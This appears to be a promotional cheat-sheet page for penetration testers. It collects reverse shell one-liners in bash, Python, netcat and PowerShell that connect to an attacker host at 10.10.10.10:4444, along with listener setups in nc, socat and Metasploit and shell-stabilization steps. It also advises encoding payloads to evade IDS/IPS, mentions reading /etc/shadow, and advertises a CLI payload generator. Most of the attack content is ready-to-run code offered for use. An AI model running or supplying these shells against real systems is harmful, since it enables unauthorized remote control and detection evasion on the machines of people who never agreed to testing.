Reverse Shell Cheat Sheet: 30+ One-Liners for Every Language (2025)
A reverse shell is the bread and butter of penetration testing. When you find a command execution vulnerability, you need a reliable way to establish an interactive session. This guide covers 30+ reverse shell one-liners across every major language.
Setting Up Your Listener
Before spawning a reverse shell, you need a listener on your attack machine:
# Netcat (most common)
nc -lvnp 4444
# Socat (fully interactive TTY)
socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
# Metasploit
msfconsole -q -x "use multi/handler; set PAYLOAD generic/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"Linux Reverse Shells
Bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1The most reliable Linux reverse shell. Requires /dev/tcp support (built into bash on most distros).
Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'Python is almost always available on Linux systems. The PTY spawn gives you a proper interactive shell.
Netcat (mkfifo)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/fWorks even when netcat doesn't have the -e flag (OpenBSD variant).
Windows Reverse Shells
PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);..."PowerShell is the go-to for Windows targets. Use Base64 encoding to avoid detection.
Stabilizing Your Shell
Raw reverse shells are fragile — Ctrl+C kills them, no tab completion, no command history. Stabilize with:
python3 -c 'import pty;pty.spawn("/bin/bash")'- Press Ctrl+Z to background
stty raw -echo; fgexport TERM=xterm
Generate any reverse shell instantly with our Reverse Shell Generator — 30 shell types across Linux, Windows, and macOS with listener commands and stabilization steps included. For a quick copy-paste reference, see the Reverse Shell Cheat Sheet.
Once you have a shell, you may want to exploit other vulnerabilities on the target. Check out our Command Injection Generator for chaining commands, or use the LFI Generator to read sensitive files like /etc/shadow.
Need to encode your payloads to bypass IDS/IPS? The Encoding Pipeline supports multi-layer encoding (Base64, URL, hex) to evade detection. Also see our XSS Payloads Guide for techniques that help establish persistence after gaining initial access.
Also available as a CLI tool: npx payload-playground revshell -i 10.10.10.10 -p 4444 -s python3 --listener nc --stabilize python-pty
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides